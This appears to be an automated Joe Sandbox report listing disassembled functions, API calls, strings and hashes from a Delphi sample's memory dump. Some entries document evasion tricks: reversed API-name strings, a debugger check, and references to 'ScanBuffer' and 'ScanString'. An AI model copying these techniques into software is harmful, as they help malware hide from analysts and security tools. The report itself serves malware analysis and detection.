                                                                                                                                                                                                                                                                                                                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4232894706-2493093252
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 54011d80752e1259b2a7c925bafb4058709f6ff821f85004fe51f99e7539efef
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 12f607d26218c1ee5c3b943e43692ca6ea3b70e2e24a0aafe6794133a6e9af30
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54011d80752e1259b2a7c925bafb4058709f6ff821f85004fe51f99e7539efef
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C610C34A54148EBDB02EBA4D870ADF77BAEF88300F609835A103AB745DA39DD458B65
                                                                                                                                                                                                                                                                                                                                  Function 02DCAFE0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02DCB000
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02DCB017
                                                                                                                                                                                                                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02DCB0AB
                                                                                                                                                                                                                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000002), ref: 02DCB0B7
                                                                                                                                                                                                                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 02DCB0CB
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Read$HandleModule
                                                                                                                                                                                                                                                                                                                                  • String ID: KernelBase$LoadLibraryExA
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2226866862-113032527
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2a49ecce144b2ca1259c95c7e895055dc760c92ad0cad3b93ee408fca9d5e67e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fd96817db7406804eae9ad9f7b554c8be4637f139b7e17a11b3be3887f304b20
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a49ecce144b2ca1259c95c7e895055dc760c92ad0cad3b93ee408fca9d5e67e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42316171A40606BBDB20DB69CC86F5AB7A8FF06368F204159EA54E73C0D730ED40DBA0
                                                                                                                                                                                                                                                                                                                                  Function 02DB435C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02DB4423,?,?,02E367C8,?,?,02DDE7A8,02DB65B1,02DDD30D), ref: 02DB4395
                                                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02DB4423,?,?,02E367C8,?,?,02DDE7A8,02DB65B1,02DDD30D), ref: 02DB439B
                                                                                                                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5,02DB43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02DB4423,?,?,02E367C8), ref: 02DB43B0
                                                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,02DB43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02DB4423,?,?), ref: 02DB43B6
                                                                                                                                                                                                                                                                                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02DB43D4
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: FileHandleWrite$Message
                                                                                                                                                                                                                                                                                                                                  • String ID: Error$Runtime error at 00000000
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1570097196-2970929446
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5464823176674621976dd363f9a2af69cc5c4a7353b612f69ee2cea3856b3519
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 53e82dc9c0d906af648f1c9e2db8faa565e569c95637e59b4c944f34e202e19a
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5464823176674621976dd363f9a2af69cc5c4a7353b612f69ee2cea3856b3519
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2BF0F6A0AC4304F4F652E6A07C3AFD9235C9F04B52F544604B36AA83C297A08CC8CB32
                                                                                                                                                                                                                                                                                                                                  Function 02DBAEC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DBAD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02DBAD59
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DBAD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02DBAD7D
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DBAD3C: GetModuleFileNameA.KERNEL32(02DB0000,?,00000105), ref: 02DBAD98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DBAD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02DBAE2E
                                                                                                                                                                                                                                                                                                                                  • CharToOemA.USER32(?,?), ref: 02DBAEFB
                                                                                                                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02DBAF18
                                                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02DBAF1E
                                                                                                                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,02DBAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02DBAF33
                                                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,02DBAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02DBAF39
                                                                                                                                                                                                                                                                                                                                  • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02DBAF5B
                                                                                                                                                                                                                                                                                                                                  • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02DBAF71
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 185507032-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 94eb93a4987bc64bde60e19770d30f4a62fe8e7f7cc87d08a40a05e582223420
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e3c31abea2f92951980a448a9107b79bda1a05a1e2f499f936ef4683da82df54
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94eb93a4987bc64bde60e19770d30f4a62fe8e7f7cc87d08a40a05e582223420
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00114CB2544204FAD202EBA4CC99FDB77ADEF44700F900915B756D62E0DA75ED448BB2
                                                                                                                                                                                                                                                                                                                                  Function 02DBE58C Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02DBE625
                                                                                                                                                                                                                                                                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02DBE641
                                                                                                                                                                                                                                                                                                                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02DBE67A
                                                                                                                                                                                                                                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02DBE6F7
                                                                                                                                                                                                                                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02DBE710
                                                                                                                                                                                                                                                                                                                                  • VariantCopy.OLEAUT32(?,00000000), ref: 02DBE745
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 351091851-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5b275c78f8864f4abce44d2f5864f018076871c6c274631a1e38b6ad0209cdee
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0251E975901229DBCB27DB58C8A0BD9B3BDEF49300F4045D5E60AE7312DA30AF858F61
                                                                                                                                                                                                                                                                                                                                  Function 02DB3598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02DB35BA
                                                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02DB3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02DB35ED
                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,02DB3610,00000000,?,00000004,00000000,02DB3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02DB3603
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3677997916-4173385793
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b3c1ed494db8fb4c6defa58a7f6fb3bf13ed0c0df683136c7f4d006f139e8873
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: dac1e0115a411ec4e0757409902685f78a3d2d526b290fb7d922339d9d9e372a
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3c1ed494db8fb4c6defa58a7f6fb3bf13ed0c0df683136c7f4d006f139e8873
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E01F575D40248FAEB12DBA0DC22FF973ECDF09B00F6004A1BA05D6780E274AD10DA68
                                                                                                                                                                                                                                                                                                                                  Function 02DC8274 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DC82FC,?,?,00000000,00000000,?,02DC8215,00000000,KernelBASE,00000000,00000000,02DC823C), ref: 02DC82C1
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC82C7
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 02DC82D9
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                                                                                  • String ID: Kernel32$sserddAcorPteG
                                                                                                                                                                                                                                                                                                                                  • API String ID: 667068680-1372893251
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0cc61833e7cb52815075b7de09e8afada2448f1e5e391e90c5a034c4542d259b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 007472570a125bd8ee91d4cdb4778655e5535e6f1e3145546736b9867d903003
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0cc61833e7cb52815075b7de09e8afada2448f1e5e391e90c5a034c4542d259b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83018474680309EFEB02EBA4EC65E9AB7EEEB48B00FA14464B801D7741D630AD40DA74
                                                                                                                                                                                                                                                                                                                                  Function 02DBAA50 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetThreadLocale.KERNEL32(?,00000000,02DBAAE7,?,?,00000000), ref: 02DBAA68
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DBA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02DBA7E2
                                                                                                                                                                                                                                                                                                                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02DBAAE7,?,?,00000000), ref: 02DBAA98
                                                                                                                                                                                                                                                                                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02DBAAA3
                                                                                                                                                                                                                                                                                                                                  • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02DBAAE7,?,?,00000000), ref: 02DBAAC1
                                                                                                                                                                                                                                                                                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02DBAACC
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4102113445-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 92bb6c6222e932bb3213e8a0f5e828f6f7076c4ce7cf4ff1c06d9eb9b7d92ba9
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 75aa3bb1651f62df43ef958c52312e4c5e9054310fb8934db4c4b17f996689eb
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92bb6c6222e932bb3213e8a0f5e828f6f7076c4ce7cf4ff1c06d9eb9b7d92ba9
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5901D471204284FBF613AA74DD31BDA775DDF86710FA105A1F403A6790E565DE008AB4
                                                                                                                                                                                                                                                                                                                                  Function 02DBAB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetThreadLocale.KERNEL32(?,00000000,02DBACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02DBAB2F
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DBA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02DBA7E2
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Locale$InfoThread
                                                                                                                                                                                                                                                                                                                                  • String ID: eeee$ggg$yyyy
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4232894706-1253427255
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 20a069715cfb25e95c816772bebb0fbc90df8b67dcba658e9db5bb072f5a8259
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d460ad6984232e7dfdbc4ca0cb511be352f8c6408e1cacc0038782f61b686b40
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20a069715cfb25e95c816772bebb0fbc90df8b67dcba658e9db5bb072f5a8259
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9041BD74604208CBDB13EA79C8B06FEB3EBDF85201F644566D493C7745EA24ED05CA79
                                                                                                                                                                                                                                                                                                                                  Function 02DC81CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DC823C,?,?,00000000,?,02DC7A7E,ntdll,00000000,00000000,02DC7AC3,?,?,00000000), ref: 02DC820A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DC82FC,?,?,00000000,00000000,?,02DC8215,00000000,KernelBASE,00000000,00000000,02DC823C), ref: 02DC82C1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC82C7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(?,?), ref: 02DC82D9
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNELBASE(?), ref: 02DC821E
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: HandleModule$AddressProc
                                                                                                                                                                                                                                                                                                                                  • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1883125708-1952140341
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6e0d308245592a125a9b83f3e531641588a518be5010277d29c4e03697801977
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ffb62a92a022e6f70cce10c213b55091d9a53bfa847c4b9eb42f137da4302adb
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e0d308245592a125a9b83f3e531641588a518be5010277d29c4e03697801977
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EEF06870A84744AFE702EBA5EC69D5AF7EDEB49700B618864E401C3714D6709D10D974
                                                                                                                                                                                                                                                                                                                                  Function 02DCF6E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(KernelBase,?,02DCFAEB,UacInitialize,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,ScanBuffer,02E37380,02DDB7B8,ScanString,02E37380,02DDB7B8,Initialize), ref: 02DCF6EE
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02DCF700
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
